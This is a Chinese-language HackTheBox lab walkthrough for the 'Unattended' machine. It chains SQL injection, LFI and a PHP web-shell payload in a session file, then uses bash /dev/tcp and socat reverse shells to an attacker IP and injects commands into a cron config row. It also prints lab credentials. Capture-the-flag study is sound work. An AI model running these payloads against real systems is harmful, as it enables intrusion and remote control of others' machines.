记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

HackTheBox-Linux-Unattended

2021-09-12 13:44

一个每日分享渗透小技巧的公众号



大家好,这里是 大余安全 的第 153 篇文章,本公众号会每日分享攻防渗透技术给大家。


靶机地址:https://www.hackthebox.eu/home/machines/profile/184

靶机难度:中级(4.4/10)

靶机发布日期:2019年5月30日

靶机描述:

Unattended is a medium difficulty Linux box which needs a good knowledge of SQL and its programming flaws. A path traversal on the web server can be exploited to get the source code of the PHP pages. A SQL injection flaw is found, which can be exploited using nested unions to gain LFI. The LFI can then be leveraged to RCE via log files or sessions file. Database access allows the www user to change the configuration and inject commands into a cronjob running as a user. The user is a member of the grub group, which has access to the kernel image through which the root password can be obtained.


请注意:对于所有这些计算机,我是通过平台授权允许情况进行渗透的。我将使用Kali Linux作为解决该HTB的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。



一、信息收集


可以看到靶机的IP是10.10.10.126...

nmap发现开放了http和https服务...

其中包含了两个域名...www.nestedflanders.htb unattended.htb,添加到hosts中...

https是apache服务...

枚举目录发现了index.php可访问...

该页面提示了只有三个链接,文字中提到必须还原到旧网站,“关于”页面还引用了攻击...

https://www.nestedflanders.htb/index.php?id=25' or '1

访问main的id是25, about是465, contact是587...我尝试对main简单的sql_or注入...是存在的...

那下面我进行了sqlmap盲注...

sqlmap -u "https://www.nestedflanders.htb/index.php?id=25" -D neddy --tables

通过--dbs枚举到了neddy...

然后利用sqlmap列出了用户数据库neddy中的表信息...

sqlmap -u "https://www.nestedflanders.htb/index.php?id=25" -D neddy -T idname --dump

sqlmap -u "https://www.nestedflanders.htb/index.php?id=25" -D neddy -T filepath --dump

通过一步一步枚举,获得了三个文本表单信息...

检查看看有什么隐藏内容...继续枚举信息...

这里获得了:

$username = "nestedflanders";$password = "1036913cf7d38d4ea4f79b050f171e9fbf3f5e";

在index.php中,发现了完整的源代码...

其中开头包含了用户名和密码....

通过完整的源代码,分析查找LFI利用点...

存在$inc...

这里应该存在文件包含漏洞...测试下

https://www.nestedflanders.htb/index.php?id=25' UNION SELECT"'UNION SELECT'/etc/passwd'-- -"-- -

通过测试,果然存在文件包含漏洞..进一步枚举下看

/var/lib/php/sessions/sess_kid5f8ebm04u252ep6fac2bo84

为了在LFI得到RCE,利用cookie更新文件漏洞...起作用了,下一步利用cookie生成的RCE输入system()即可...

cmd=id&shell=<?php system($_GET['cmd']); ?>

输入简单的shell...获得了www低权用户信息...

bash -c 'bash -i >& /dev/tcp/10.10.14.51/443 0>&1'

输入简单的shell,获得了外壳...

但是该用户下没安装python和nc...无法进行tty....查看到靶机上安装了socat...

socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.10.14.51:443socat file:`tty`,raw,echo=0 tcp-listen:443,reuseaddr

可以socat用来获取完整的tty,利用socat获得反向外壳...

mysql -u nestedflanders -p1036913cf7d38d4ea4f79b050f171e9fbf3f5e

并利用前面获得的用户名密码,登陆了靶机的mysql....进入neddy数据库,检查config表格...

在86行存在一个perl脚本...

该脚本会不时地执行,我们无法读取或替换这些脚本,但是可以从数据库中更改该配置的值,并使用反向shell命令,由于没用nc,继续利用socat...

update config set option_value = "socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.10.14.51:443" where id = 86;
select * from config where id = 86;socat file:`tty`,raw,echo=0 tcp-listen:443,reuseaddr

修改完后,获得了反向外壳...读取到了user_flag信息...

枚举了grub组信息,发现该组只有/boot/initrd.img-4.9.0-8-amd64在运行着...

copy到新文件分析看...这是gzip文件...通过解压发现这是文档文件...需要cpio提取...

使用cpio后打开了文档...为启动ramdisk提供了文件系统...

通过阅读scripts/local-block/cryptroot内容...

最主要的是该行`/sbin/uinitrd c0m3s3f0ss34nt4n1 | $cryptopen`生成root密码并将其通过管道传输到`$cryptopen`

意思就是/sbin/uinitrd会根据c0m3s3f0ss34nt4n1生成密匙...





通过/sbin/uinitrd生成的密匙,尝试root成功登陆...获得了root权限和root_flag信息...


由于我们已经成功得到root权限查看user和root.txt,因此完成这台中级的靶机,希望你们喜欢这台机器,请继续关注大余后期会有更多具有挑战性的机器,一起练习学习。


如果你有其他的方法,欢迎留言。要是有写错了的地方,请你一定要告诉我。要是你觉得这篇博客写的还不错,欢迎分享给身边的人。


如果觉得这篇文章对你有帮助,可以转发到朋友圈,谢谢小伙伴~



随缘收徒中~~随缘收徒中~~随缘收徒中~~


欢迎加入渗透学习交流群,想入群的小伙伴们加我微信,共同进步共同成长!


大余安全

一个全栈渗透小技巧的公众号






知识来源: https://mp.weixin.qq.com/s?__biz=Mzg3MDMxMTg3OQ==&mid=2247495528&idx=1&sn=36ab6447dbae187576d646fb3b72228b

阅读:151219 | 评论:0 | 标签:linux hack

想收藏或者和大家分享这篇好文章→复制链接地址

“HackTheBox-Linux-Unattended”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

黑帝公告 📢

永久免费持续更新精选优质黑客技术文章Hackdig,帮你成为掌握黑客技术的英雄

标签云 ☁